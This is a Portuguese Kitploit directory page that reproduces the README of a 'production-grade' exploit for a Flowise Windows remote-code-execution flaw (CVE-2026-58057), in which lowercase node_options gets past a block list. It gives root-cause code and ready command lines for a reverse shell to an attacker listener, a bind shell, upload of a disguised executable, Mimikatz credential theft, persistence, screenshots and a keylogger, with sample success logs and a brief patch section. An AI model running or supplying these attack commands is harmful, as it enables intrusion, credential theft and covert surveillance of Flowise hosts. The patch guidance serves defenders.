Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Flowise-CVE-2026-58057-exploit — Exploit de RCE no Windows da Flowise para a CVE-2026-58057. Contorna a validação de variáveis de ambiente através de uma falha de sensibilidade a maiúsculas/minúsculas. Usa node_options para injetar código arbitrário via MCP stdio. Suporta reverse shell, persistência, upload de arquivos e extração de credenciais. Apenas para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
Mecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoComando e ControleRed Teaming
Desenvolvimento de Payloads
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

Ver Repositório
19há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Exploit de RCE no Windows da Flowise para a CVE-2026-58057. Contorna a validação de variáveis de ambiente através de uma falha de sensibilidade a maiúsculas/minúsculas. Usa node_options para injetar código arbitrário via MCP stdio. Suporta reverse shell, persistência, upload de arquivos e extração de credenciais. Apenas para testes de segurança autorizados.

Compartilhar

Flowise CVE-2026-58057 - Exploit de Execução Remota de Código no Windows

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge

Affected Versions Badge
Fixed Version Badge

📋 Visão Geral

Este é um exploit de nível de produção para CVE-2026-58057, uma vulnerabilidade crítica de Execução Remota de Código no Flowise em plataformas Windows. A vulnerabilidade decorre da validação de variáveis de ambiente que diferencia maiúsculas de minúsculas e que não consegue bloquear node_options em minúsculas, permitindo que atacantes contornem a lista de bloqueio NODE_OPTIONS e executem código arbitrário por meio da configuração Custom MCP stdio.

O exploit demonstra práticas profissionais de engenharia de software, com arquitetura modular, tratamento abrangente de erros e suporte a múltiplos tipos de payload.

f1

f2

⚠️ Aviso Legal

IMPORTANTE: Esta ferramenta é fornecida apenas para testes de segurança autorizados, testes de penetração e fins educacionais. O autor não é responsável por qualquer uso indevido ou dano causado por este software. Sempre obtenha autorização adequada antes de testar qualquer sistema.

🔍 Detalhes Técnicos

Causa Raiz da Vulnerabilidade

root@kitploit:~
# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

Mecanismo do Exploit

  1. O atacante autentica no Flowise

  2. Cria/Modifica o nó Custom MCP stdio

  3. Injeta a variável de ambiente node_options em minúsculas

  4. Define o valor como --require malicious-loader.js

  5. O Node.js executa o loader quando o MCP stdio é executado

  6. Execução de código arbitrário é alcançada

✨ Recursos

Principais Capacidades

  • ✅ Reverse Shell - Conecta de volta à máquina do atacante

  • ✅ Bind Shell - Abre porta de escuta no alvo

  • ✅ Execução de Comandos - Executa comandos arbitrários do sistema

  • ✅ Upload de Arquivos - Envia arquivos para o sistema alvo

  • ✅ Persistência - Múltiplos mecanismos de persistência

  • ✅ Coleta de Informações - Coleta informações do sistema

  • ✅ Extração de Credenciais - Integração com Mimikatz

  • ✅ Captura de Tela - Captura telas da área de trabalho

  • ✅ Keylogger - Instala capacidade de registro de teclas

Recursos Técnicos

  • 🔐 Múltiplos Métodos de Autenticação - Chave de API ou usuário/senha

  • 🔄 Lógica de Nova Tentativa Automática - Resiliente a problemas de rede

  • 🧹 Autolimpeza - Remove arquivos de loader do alvo

  • 🌐 Multiplataforma - Funciona em Windows/Linux/macOS

  • 🎨 Saída Colorida - Legibilidade aprimorada

  • 📊 Depuração Detalhada - Registro detalhado para solução de problemas

📦 Instalação

Pré-requisitos

  • Python 3.6 ou superior

  • pip (gerenciador de pacotes do Python)

Instalação Rápida

root@kitploit:~
# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Instalação via Docker (Opcional )

root@kitploit:~
FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 Uso

Opções de Linha de Comando

root@kitploit:~
python3 exploit.py --help

Opções de Autenticação

OpçãoDescriçãoExemplo
-t, --targetURL do Flowise (Obrigatório)http://localhost:3000
-k, --api-keyChave de API do Flowiseflowise_abc123...
-u, --usernameNome de usuárioadmin
-p, --passwordSenhapassword123

Opções de Payload

OpçãoDescriçãoExemplo
--payloadTipo de payloadreverse_shell
--lhostHost do listener192.168.1.100
--lportPorta do listener4444
--commandComando a executarwhoami
--local-fileArquivo para enviarpayload.exe
--remote-pathCaminho remoto de salvamentoC:\\Temp\\update.exe

Opções de Execução

OpçãoDescrição
--interactiveIniciar shell interativo
--verboseAtivar saída de depuração
--timeoutTempo limite da requisição em segundos
--retriesNúmero de tentativas

📝 Exemplos de Uso

1. Reverse Shell Básico

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. Reverse Shell Interativo

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. Execução de Comandos

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. Upload de Arquivos

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. Extração de Credenciais (Mimikatz )

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. Instalação de Persistência

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. Coleta de Informações

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. Captura de Tela

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 Tipos de Payload

PayloadDescriçãoArgumentos
reverse_shellConectar de volta ao listener--lhost, --lport
bind_shellAbrir porta de escuta--lport
command_execExecutar comando--command
file_uploadEnviar arquivo para o alvo--local-file, --remote-path
persistenceInstalar persistênciaNenhum
info_gatherColetar informações do sistemaNenhum
mimikatzExtrair credenciaisNenhum
screenshotCapturar telaNenhum
keyloggerInstalar keyloggerNenhum

🛡️ Mitigação

Atualizar Flowise

root@kitploit:~
# Upgrade to version 3.1.3 or later
npm install -g flowise@latest
# or
docker pull flowiseai/flowise:latest

Soluções Alternativas

  • Restrinja o acesso à configuração Custom MCP

  • Implemente segmentação de rede

  • Monitore variáveis de ambiente suspeitas

  • Use Firewall de Aplicação Web (WAF )

Código Corrigido

root@kitploit:~
# Fixed Validation (Case-Insensitive)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key.upper() in dangerous:  # Case-insensitive check
    raise ValueError(f"Modification not allowed")

📊 Exemplos de Saída

Exploit Bem-sucedido

root@kitploit:~
[14:32:15] ℹ Starting exploit sequence...
[14:32:15] ℹ Attempting authentication...
[14:32:16] ✓ Authenticated with API key
[14:32:16] ℹ Preparing reverse_shell payload execution...
[14:32:16] ℹ Injecting environment variable...
[14:32:17] ℹ Triggering payload execution...
[14:32:19] ✓ Payload 'reverse_shell' executed successfully!
[14:32:19] ℹ Reverse shell listener ready on 192.168.1.50:4444

Modo Verbose

root@kitploit:~
[14:32:15] 🔍 Session created with retry strategy
[14:32:15] 🔍 Using existing workspace: ws_123456
[14:32:16] 🔍 Loader written: /tmp/loader_1234_1234567890.js
[14:32:16] 🔍 MCP stdio configuration updated

🐛 Solução de Problemas

Problemas Comuns

ProblemaSolução
Erro de Certificado SSLpip install --trusted-host pypi.org -r requirements.txt
Permissão Negadapip install --user -r requirements.txt
Conexão RecusadaVerifique a URL do alvo e a conectividade de rede
Falha de AutenticaçãoVerifique a chave de API ou usuário/senha
Falha no PayloadUse --verbose para depuração detalhada
Versão do PythonGaranta que o Python 3.6+ esteja instalado

Comandos de Depuração

root@kitploit:~
# Enable verbose logging
python3 exploit.py -t http://localhost:3000 -k API_KEY --verbose

# Test connectivity
curl -k https://localhost:3000/api/v1/version

# Check Python version
python3 --version

📁 Estrutura de Arquivos

root@kitploit:~
flowise-CVE-2026-58057-exploit/
├── exploit.py          # Main exploit script
├── requirements.txt    # Core dependencies
├── README.md          # This documentation
├── LICENSE            # MIT License
└── CHANGELOG.md       # Version history

🤝 Contribuindo

  1. Faça um fork do repositório

  2. Crie um branch de funcionalidade (git checkout -b feature/amazing )

  3. Faça commit das alterações (git commit -m 'Add amazing feature')

  4. Envie para o branch (git push origin feature/amazing)

  5. Abra um Pull Request

📜 Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

🏆 Agradecimentos

  • FlowiseAI pelo produto

  • Pesquisadores de segurança que descobriram vulnerabilidades semelhantes

  • Comunidade de pentest pelas metodologias de teste

🔗 Referências

  • CVE-2026-58057

  • Repositório GitHub do Flowise

  • Documentação do Flowise

  • Segurança de Variáveis de Ambiente do Node.js

📧 Contato

Autor: Sudeepa Wanigarathna Pesquisador de Segurança e Testador de Penetração

⭐ Suporte

Se você achar esta ferramenta útil, considere:

  • ⭐ Dar estrela no repositório no GitHub

  • 🔔 Seguir para atualizações

  • 📝 Relatar problemas ou sugestões


Feito com ❤️ para a comunidade de segurança

Baixar ferramenta